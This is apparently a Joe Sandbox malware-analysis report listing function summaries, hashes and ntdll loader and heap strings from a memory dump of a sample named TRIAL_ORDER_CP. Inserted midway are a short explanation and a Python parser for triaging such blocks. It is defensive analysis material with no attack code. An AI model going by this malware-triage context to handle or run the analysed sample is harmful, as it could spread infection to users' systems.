                                          • Opcode Fuzzy Hash: 218c2e078614a99eaaf7e38129d7ea6b3984a0910dcbeb82fcdb42d62b1221ce
                                          • Instruction Fuzzy Hash: A3B18BB69093519FD711CF64C880A5FBBE8EB84798F45493EF988D7280DB70D9488F92
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 33B3D879
                                            • Part of subcall function 33B14779: RtlDebugPrintTimes.NTDLL ref: 33B14817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1975516107
                                          • Opcode ID: 16f1dde93dd649dec0c9cef0f9289d5349392c404019fbe184d991cf8599edb5
                                          • Instruction ID: e69c284300f159b5816f3a82da0a7e959c11c24dda67fb302fa651451ac7cf5b
                                          • Opcode Fuzzy Hash: 16f1dde93dd649dec0c9cef0f9289d5349392c404019fbe184d991cf8599edb5
                                          • Instruction Fuzzy Hash: F551DBB5A053A59FEB04DFA4C584B89BBF1FF453A8F24416DD810AB691DB70A842CB80
                                          Strings
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33B0D06F
                                          • @, xrefs: 33B0D2B3
                                          • @, xrefs: 33B0D09D
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 33B0D136
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33B0D263
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33B0D202
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33B0D0E6
                                          • @, xrefs: 33B0D24F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-1356375266
                                          • Opcode ID: 13298f397fb867370552f5726287ec0c131cb45a848890c0c4b966fb6a986403
                                          • Instruction ID: 7eebeb5ff4fbe064a5249e7c4d35db95da5538614f0514ebac4ca2aad8b5544c
                                          • Opcode Fuzzy Hash: 13298f397fb867370552f5726287ec0c131cb45a848890c0c4b966fb6a986403
                                          • Instruction Fuzzy Hash: 74A13BB19083559FE721CF14C850B5BBBE8FB84799F00493EFA9896281DB74D948CF92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                          • API String ID: 0-2224505338
                                          • Opcode ID: f79e9805e77882f26cf8dc512eb2486ecb78e8d65e22de412e2015d72659bceb
                                          • Instruction ID: 41f8b898ef9aac41ee85f18d1d66769bc53c9cab607c32b76fb2e2c9ccb7d545
                                          • Opcode Fuzzy Hash: f79e9805e77882f26cf8dc512eb2486ecb78e8d65e22de412e2015d72659bceb
                                          • Instruction Fuzzy Hash: C051E636912345EFDB01CFE8D884E6A7BB4EF04664F1489B6F8459B622CF75D990CE10
                                          Strings
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 33B986BD
                                          • AVRF: -*- final list of providers -*- , xrefs: 33B9880F
                                          • VerifierDlls, xrefs: 33B9893D
                                          • HandleTraces, xrefs: 33B9890F
                                          • VerifierFlags, xrefs: 33B988D0
                                          • VerifierDebug, xrefs: 33B98925
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 33B986E7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 614e92acf51f8c3f8407b5b140e805e620cbbcf88ec4e9aad317df814d307f7d
                                          • Instruction ID: 33152adb4c4fc6435c87d013abd24392f99fd5983cd71285aecbf4c179c6429c
                                          • Opcode Fuzzy Hash: 614e92acf51f8c3f8407b5b140e805e620cbbcf88ec4e9aad317df814d307f7d
                                          • Instruction Fuzzy Hash: D79102B29093A1AFF711DF24C880F9AB7D8EB44659F4545B9F980EB652C730EC05CBA1
                                          Strings
                                          • apphelp.dll, xrefs: 33B32382
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B7A7AF
                                          • LdrpDynamicShimModule, xrefs: 33B7A7A5
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33B7A79F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: d20cfa2add0f9505075375a0496d30a080e6501ecc89a00507bd4333610545ae
                                          • Instruction ID: 1c7a57e31915d71e8e834154ece88978eab22b1340b97407507f1add4e8d0b22
                                          • Opcode Fuzzy Hash: d20cfa2add0f9505075375a0496d30a080e6501ecc89a00507bd4333610545ae
                                          • Instruction Fuzzy Hash: 9831F376A01290EFEB50AF58C880E9A77F8FF80754F190179E820BB351DBB19D42CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: f59df00c8c5e402564dfcfab9e125b5046d51e239f95792b3b1300bbcfcff2c8
                                          • Instruction ID: 96f7be0d37be2f0063de6a036e9bb95c833b6b03586c2b26e84e1c314923f531
                                          • Opcode Fuzzy Hash: f59df00c8c5e402564dfcfab9e125b5046d51e239f95792b3b1300bbcfcff2c8
                                          • Instruction Fuzzy Hash: 5B42CC756087819FD305CF28C880B2ABBE5FF88688F084A7DE895DB652DB34D945CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: 5a7c082ce054aaa069bb9fb21cc4503f63822dfb88bc384e24e8809cacd376b0
                                          • Instruction ID: d5cab7cb579b1dc3e41c769c017d4bca494a5a2ce9d1d91163e45ef13b65e121
                                          • Opcode Fuzzy Hash: 5a7c082ce054aaa069bb9fb21cc4503f63822dfb88bc384e24e8809cacd376b0
                                          • Instruction Fuzzy Hash: 13C12275E007259EEB04CB64C891BBEBFA5EF45301F58427AE85AEB290EF748D44C391
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: f6f757ce51e9103dba1bb0de93c631bbfe28b2a47e72eaf15e7bb03af7166569
                                          • Instruction ID: 9b771ced0b61beecd7659e53501c50538a3925d4335c2c3ba5162b1aff21f01b
                                          • Opcode Fuzzy Hash: f6f757ce51e9103dba1bb0de93c631bbfe28b2a47e72eaf15e7bb03af7166569
                                          • Instruction Fuzzy Hash: F29155B5E053E4DFEB24DF18C944B9A77A4FB40758F04013AE954AF682EB709C42CB95
                                          Strings
                                          • RtlGetAssemblyStorageRoot, xrefs: 33B81F6A, 33B81FA4, 33B81FC4
                                          • SXS: %s() passed the empty activation context, xrefs: 33B81F6F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33B81F8A
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33B81FA9
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33B81F82
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33B81FC9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 51c6a329a5187428ec0058d3d20ce2ce0509d38d4e9a92c7a11816255aac0cd2
                                          • Instruction ID: 89bd963fe356bb56d392ae837ee5291a19712cf56a71b1314dd2150fe063f513
                                          • Opcode Fuzzy Hash: 51c6a329a5187428ec0058d3d20ce2ce0509d38d4e9a92c7a11816255aac0cd2
                                          • Instruction Fuzzy Hash: EE310576E02224BBFB108A89DC40F5B7668EF406D0F0441BAF940BF242C771AE00DBE8
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B4C5E3
                                          • LdrpInitializeImportRedirection, xrefs: 33B87F82, 33B87FF6
                                          • Loading import redirection DLL: '%wZ', xrefs: 33B87F7B
                                          • LdrpInitializeProcess, xrefs: 33B4C5E4
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 33B87F8C, 33B88000
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 33B87FF0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: c69327aad5aecc1993aa26ef286aadb29ff0b970e440411610743adf55b6b652
                                          • Instruction ID: 58a5d4482770dc9c4ab11c3ca26fefd095c65dab8aa1931dfd517c77b364001a
                                          • Opcode Fuzzy Hash: c69327aad5aecc1993aa26ef286aadb29ff0b970e440411610743adf55b6b652
                                          • Instruction Fuzzy Hash: 1C31E5B1A05391AFD314EF28DC46E2AB7D4EFC5B64F014979F894AB291D620DC05CBA2
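The function summaries in this section all come from the same memory dump (process 3, region 33AE0000, "based on PE: true") and their string sets contain ntdll's own source paths (minkernel\ntdll\ldrinit.c, minkernel\ntdll\ldrredirect.c) and internal loader symbol names (LdrpInitializeProcess, LdrpInitializeImportRedirection). When triaging a report like this one it helps to parse these blocks mechanically and group them by dump region, so that a region whose functions carry ntdll source-path strings stands out. The following parser is an added example written for this page, not Joe Sandbox's code or output format specification; it keys on the field names visible in the report ("Source File", "String ID", "Instruction Fuzzy Hash") and runs over a constructed sample copied in shape from the two blocks above. The `$` separator used in "String ID" and the regex for ntdll source paths are assumptions drawn only from what this page shows.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function-summary blocks in the shape of the
# report listing above (field names are the report's own; the "Download
# File" widget text that the HTML extraction appended is not included).
SAMPLE = r"""
Strings
Memory Dump Source
• Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
• Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
• Instruction Fuzzy Hash: 1C31E5B1A05391AFD314EF28DC46E2AB7D4EFC5B64F014979F894AB291D620DC05CBA2
Strings
Memory Dump Source
• Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop$PreferredUILanguages
• API String ID: 0-3532704233
• Instruction Fuzzy Hash: A3B18BB69093519FD711CF64C880A5FBBE8EB84798F45493EF988D7280DB70D9488F92
"""


@dataclass
class FunctionRecord:
    """One 'Memory Dump Source' block of the report, reduced to the fields
    an analyst groups and pivots on."""
    source_file: str = ""
    offset: str = ""
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    fuzzy_hash: str = ""


BLOCK_START = "Memory Dump Source"
FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# Assumption: ntdll source paths in this report always look like
# minkernel\ntdll\<name>.c (that is what every block on the page shows).
NTDLL_SOURCE = re.compile(r"minkernel\\ntdll\\[a-z]+\.c$", re.IGNORECASE)


def parse_blocks(text):
    """Split the report text into FunctionRecord objects, one per block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == BLOCK_START:
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            # "<dump>.sdmp, Offset: 33AE0000, based on PE: true"
            parts = [p.strip() for p in value.split(",")]
            cur.source_file = parts[0]
            for p in parts[1:]:
                if p.startswith("Offset:"):
                    cur.offset = p.split(":", 1)[1].strip()
        elif key == "String ID":
            # Assumption: '$' separates the individual strings, as seen above.
            cur.strings = [s for s in value.split("$") if s]
        elif key == "API String ID":
            cur.api_string_id = value
        elif key == "Instruction Fuzzy Hash":
            cur.fuzzy_hash = value
    return records


def ntdll_source_paths(rec):
    """ntdll source-file strings referenced by one function summary."""
    return [s for s in rec.strings if NTDLL_SOURCE.search(s)]


def flag_ntdll_regions(records):
    """Group records by (dump file, offset) and keep only regions whose
    functions reference ntdll source paths, with the paths they carry."""
    by_region = {}
    for r in records:
        by_region.setdefault((r.source_file, r.offset), set()).update(
            ntdll_source_paths(r))
    return {k: sorted(v) for k, v in by_region.items() if v}


if __name__ == "__main__":
    for (dump, off), paths in flag_ntdll_regions(parse_blocks(SAMPLE)).items():
        print(f"{dump} @ {off}: {', '.join(paths)}")
```

Running it on the full report section (rather than the two-block sample) lists each dump region once with the ntdll source paths its functions reference; a region of an unpacked payload that references none is simply absent from the output, which is the quickest way to tell a mapped image of ntdll apart from the sample's own code in a long listing like this one.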
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 858a8101bce6b57d2d92b21684d162882740f5250098d528ed93581ac4e2af09
                                          • Instruction ID: 78abde16e37e3b2583910d6ee37b73a152328d247bdd3143d6c2c1a47c6dd241
                                          • Opcode Fuzzy Hash: 858a8101bce6b57d2d92b21684d162882740f5250098d528ed93581ac4e2af09
                                          • Instruction Fuzzy Hash: 48F18874A00745DFEB05CF68C884F6ABBB5FF44344F1482A9E459DB691DB38E981CB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2283098728
                                          • Opcode ID: 5425d36efdfd6a76ffefade2879a5633c27cdcb1c9ac15296516440e510e397c
                                          • Instruction ID: 9661685729be7e6854dc7445f563257c5de47e7841d8e00a11071489ea10960d
                                          • Opcode Fuzzy Hash: 5425d36efdfd6a76ffefade2879a5633c27cdcb1c9ac15296516440e510e397c
                                          • Instruction Fuzzy Hash: F451F271A023619FE710EF28C884F1977A4FB86364F18063DE4A5DB6D2EB70E815CB91
                                          APIs
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 33B880E2
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 33B880E9
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B880F3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          • Opcode ID: 5f64ae07f18115a0f803d5b99576a0372f91146b9ccf32d4e10301d04ebf514a
                                          • Instruction ID: fdcb12dc2d6b2f91c5c06a46747e11d5b5b1df4d5ea401f9186c5defe693ec17
                                          • Opcode Fuzzy Hash: 5f64ae07f18115a0f803d5b99576a0372f91146b9ccf32d4e10301d04ebf514a
                                          • Instruction Fuzzy Hash: 7A41C2B5901390ABD710EF24CD40F4B7BE8EF44B54F05493AB998E7251EB74E801CB95
                                          APIs
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33B94508
                                          • LdrpCheckRedirection, xrefs: 33B9450F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 33B94519
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          • Opcode ID: d778e28753607958f9e21f367405f84be20ecda38504bad5f9f508f0563613a6
                                          • Instruction ID: 70b94db1da560ab40fe3595ad13462ad49b4e816050288d3997655f89a1e40a4
                                          • Opcode Fuzzy Hash: d778e28753607958f9e21f367405f84be20ecda38504bad5f9f508f0563613a6
                                          • Instruction Fuzzy Hash: 4C419F76605361DBEB11CF58C940A9677E8EFC8794F0A0679EC989B351DB30DC808B91
                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 33B35167
                                          • Kernel-MUI-Language-Disallowed, xrefs: 33B35272
                                          • Kernel-MUI-Language-Allowed, xrefs: 33B3519B
                                          • Kernel-MUI-Language-SKU, xrefs: 33B3534B
                                          • WindowsExcludedProcs, xrefs: 33B3514A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 8c46c3de531caf22914afbe962c85e1faeb9efad19db15f1f5f07ee5fdde8243
                                          • Instruction ID: 182166cbeb1df43ea794769f2cdb6066f76389c0b0153c55aec7692342ecbe4d
                                          • Opcode Fuzzy Hash: 8c46c3de531caf22914afbe962c85e1faeb9efad19db15f1f5f07ee5fdde8243
                                          • Instruction Fuzzy Hash: B5F15CB6D01229EFDB16CF99C940EDEBBB8EF09650F54016BE515E7610EB709E01CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 4f74acef7037d2dd39c800fdf85ec95970c9fb04b5a6ee740a5eca309be6f0f5
                                          • Instruction ID: 5cd4874107662bbab20c594234ae6e2d0986ca77a1c8faad82ba3105853fcdd4
                                          • Opcode Fuzzy Hash: 4f74acef7037d2dd39c800fdf85ec95970c9fb04b5a6ee740a5eca309be6f0f5
                                          • Instruction Fuzzy Hash: 63F1D476E006258BCB08CF6CD99067DFBF9EF88210B594179D496EB391D734EA41CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: 274403c2610d1868dc21411bc957c80d4a16ca58a01bb35ea487e4a061414d5d
                                          • Instruction ID: 6548ef7f63d56fd305a1d80ba200d8ecc627d4f2df6fd9acf2fe3491de4453f9
                                          • Opcode Fuzzy Hash: 274403c2610d1868dc21411bc957c80d4a16ca58a01bb35ea487e4a061414d5d
                                          • Instruction Fuzzy Hash: 31014C76506290DEE305D32CE408F867BA4EB4173EF1944BAF44047DA38BA5D880DD60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: 8769b7ae1c937c61a4b1be7124f0674e235c3d3277cde239f442138fb5fb8608
